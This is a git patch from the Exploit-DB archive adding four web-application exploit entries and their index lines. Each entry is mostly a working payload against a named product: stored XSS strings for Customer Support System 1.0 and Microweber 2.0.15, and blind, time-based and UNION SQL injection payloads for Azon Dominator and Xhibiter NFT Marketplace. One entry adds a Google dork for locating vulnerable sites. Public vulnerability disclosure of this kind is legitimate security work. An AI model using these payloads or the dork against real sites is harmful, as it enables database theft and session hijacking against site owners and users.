From ec1496737698629b17228c7478e579d7a453ad7f Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 2 Jul 2024 00:16:21 +0000
Subject: [PATCH] DB: 2024-07-02

5 changes to exploits/shellcodes/ghdb

Azon Dominator Affiliate Marketing Script - SQL Injection

Customer Support System 1.0 - Stored XSS

Microweber 2.0.15 - Stored XSS

Xhibiter NFT Marketplace 1.10.2 - SQL Injection
---
 exploits/php/webapps/52057.txt | 17 +++++++++++++++
 exploits/php/webapps/52058.txt | 19 +++++++++++++++++
 exploits/php/webapps/52059.txt | 38 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/52060.txt | 27 ++++++++++++++++++++++++
 files_exploits.csv             |  4 ++++
 5 files changed, 105 insertions(+)
 create mode 100644 exploits/php/webapps/52057.txt
 create mode 100644 exploits/php/webapps/52058.txt
 create mode 100644 exploits/php/webapps/52059.txt
 create mode 100644 exploits/php/webapps/52060.txt

diff --git a/exploits/php/webapps/52057.txt b/exploits/php/webapps/52057.txt
new file mode 100644
index 000000000..2d648e9f1
--- /dev/null
+++ b/exploits/php/webapps/52057.txt
@@ -0,0 +1,17 @@
+# Exploit Title:  Customer Support System 1.0 - (XSS) Cross-Site
+Scripting Vulnerability in the "subject" at "ticket_list"
+# Date: 28/11/2023
+# Exploit Author: Geraldo Alcantara
+# Vendor Homepage:
+https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows
+# CVE : CVE-2023-49976
+*Steps to reproduce:*
+1- Log in to the application.
+2- Visit the ticket creation/editing page.
+3- Create/Edit a ticket and insert the malicious payload into the
+"subject" field/parameter.
+Payload: <dt/><b/><script>alert(document.domain)</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/52058.txt b/exploits/php/webapps/52058.txt
new file mode 100644
index 000000000..bd15c7674
--- /dev/null
+++ b/exploits/php/webapps/52058.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Stored XSS in Microweber
+# Date: 06/18/2024
+# Exploit Author: tmrswrr
+# Vendor Homepage: (https://microweber.me/)
+# Version: 2.0.15
+# Tested on: (http://active.demo.microweber.me/)
+
+## Vulnerability Description
+A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
+
+## Steps to Reproduce
+1. Log in to the application.
+2. Navigate to `Users > Edit Profile`.
+3. In the `First Name` field, input the following payload:
+
+    "><img src=x onerror=confirm(document.cookie)>
+
+4. Save the changes.
+5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.
\ No newline at end of file
diff --git a/exploits/php/webapps/52059.txt b/exploits/php/webapps/52059.txt
new file mode 100644
index 000000000..e1c7742f8
--- /dev/null
+++ b/exploits/php/webapps/52059.txt
@@ -0,0 +1,38 @@
+ # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
+# Date: 2024-06-03
+# Exploit Author: Buğra Enis Dönmez
+# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
+# Demo Site: https://azon-dominator.webister.net/
+# Tested on: Arch Linux
+# CVE: N/A
+
+### Request ###
+
+POST /fetch_products.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+x-requested-with: XMLHttpRequest
+Referer: https://localhost/
+Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
+Content-Length: 79
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
+
+###
+
+### Parameter & Payloads ###
+
+Parameter: cid (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: cid=1) AND 7735=7735 AND (5267=5267
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
+
+###
\ No newline at end of file
diff --git a/exploits/php/webapps/52060.txt b/exploits/php/webapps/52060.txt
new file mode 100644
index 000000000..db2dd067e
--- /dev/null
+++ b/exploits/php/webapps/52060.txt
@@ -0,0 +1,27 @@
+# Exploit Title: xhibiter nft marketplace SQLI
+# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
+# Date: 29/06/204
+# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
+# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
+# Version: 1.10.2
+# Tested on: linux
+# CVE : [if applicable]
+
+on this dir
+https://localhost/collections?id=2
+xhibiter nft marketplace suffers from SQLI
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 36 columns
+    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+---
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 64d6415b7..966949383 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14543,6 +14543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1081;OSVDB-15526,,,,,https://www.securityfocus.com/bid/13082/info
 25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1082;OSVDB-15524,,,,,https://www.securityfocus.com/bid/13082/info
 12695,exploits/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,webapps,php,,2010-05-21,,0,,,,,,
+52059,exploits/php/webapps/52059.txt,"Azon Dominator Affiliate Marketing Script - SQL Injection",2024-07-01,"Buğra Enis Dönmez",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 860,exploits/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper",2005-03-07,sirius_black,webapps,php,,2005-03-06,,1,OSVDB-14632;CVE-2005-0700,,,,,
 1616,exploits/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,webapps,php,,2006-03-25,2017-04-07,1,,,,,,
 24731,exploits/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",webapps,php,,2004-11-12,2013-03-12,1,CVE-2004-2725;OSVDB-11704,,,,,https://www.securityfocus.com/bid/11654/info
@@ -16659,6 +16660,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
 49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
 49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
+52057,exploits/php/webapps/52057.txt,"Customer Support System 1.0 - Stored XSS",2024-07-01,"Geraldo Alcantara",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 50994,exploits/php/webapps/50994.txt,"CuteEditor for PHP 6.6 - Directory Traversal",2022-08-01,"Stefan Hesselman",webapps,php,,2022-08-01,2022-08-01,0,,,,,,
 9485,exploits/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",webapps,php,,2009-08-23,,1,CVE-2009-2960;OSVDB-57391,,,,,
 20111,exploits/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,webapps,php,,2012-07-27,2012-07-27,1,OSVDB-84289,"Metasploit Framework (MSF)",,,,
@@ -23507,6 +23509,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37735,exploits/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2015-08-07,0,OSVDB-125875,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
 37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2016-08-30,0,OSVDB-125873,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
 50768,exploits/php/webapps/50768.txt,"Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)",2022-02-21,"Chetanya Sharma",webapps,php,,2022-02-21,2022-02-21,0,CVE-2022-0557,,,,,
+52058,exploits/php/webapps/52058.txt,"Microweber 2.0.15 - Stored XSS",2024-07-01,tmrswrr,webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 32831,exploits/php/webapps/32831.txt,"Microweber CMS 0.93 - Cross-Site Request Forgery",2014-04-13,sajith,webapps,php,,2014-04-13,2014-04-13,1,OSVDB-105791,,,http://www.exploit-db.com/screenshots/idlt33000/screen-shot-2014-04-13-at-104833.png,http://www.exploit-db.commicroweber-0.9343.zip,
 35720,exploits/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",webapps,php,80,2015-01-07,2015-01-07,0,CVE-2014-9464;OSVDB-116689,,,,http://www.exploit-db.commicroweber-0.934.tar.gz,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,,2021-05-10,2021-05-10,0,CVE-2020-28337,,,,,
@@ -34356,6 +34359,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25090,exploits/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",webapps,php,,2005-02-08,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12489/info
 21381,exploits/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,webapps,php,,2002-04-15,2012-09-19,1,OSVDB-86910,,,,,https://www.securityfocus.com/bid/4513/info
 8101,exploits/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,webapps,php,,2009-02-23,,1,OSVDB-52357;CVE-2009-0810,,,,,
+52060,exploits/php/webapps/52060.txt,"Xhibiter NFT Marketplace 1.10.2 - SQL Injection",2024-07-01,"Sohel Yousef",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
 1605,exploits/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,webapps,php,,2006-03-21,2016-06-30,1,OSVDB-24059;CVE-2006-1371;OSVDB-24058,,,,http://www.exploit-db.comxhp_0_5.tar.gz,
 28509,exploits/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",webapps,php,,2006-09-11,2013-09-25,1,CVE-2006-4751;OSVDB-28751,,,,,https://www.securityfocus.com/bid/19948/info
 40576,exploits/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",webapps,php,,2016-10-19,2016-10-19,0,,,,,http://www.exploit-db.comxhp_0_5_1.zip,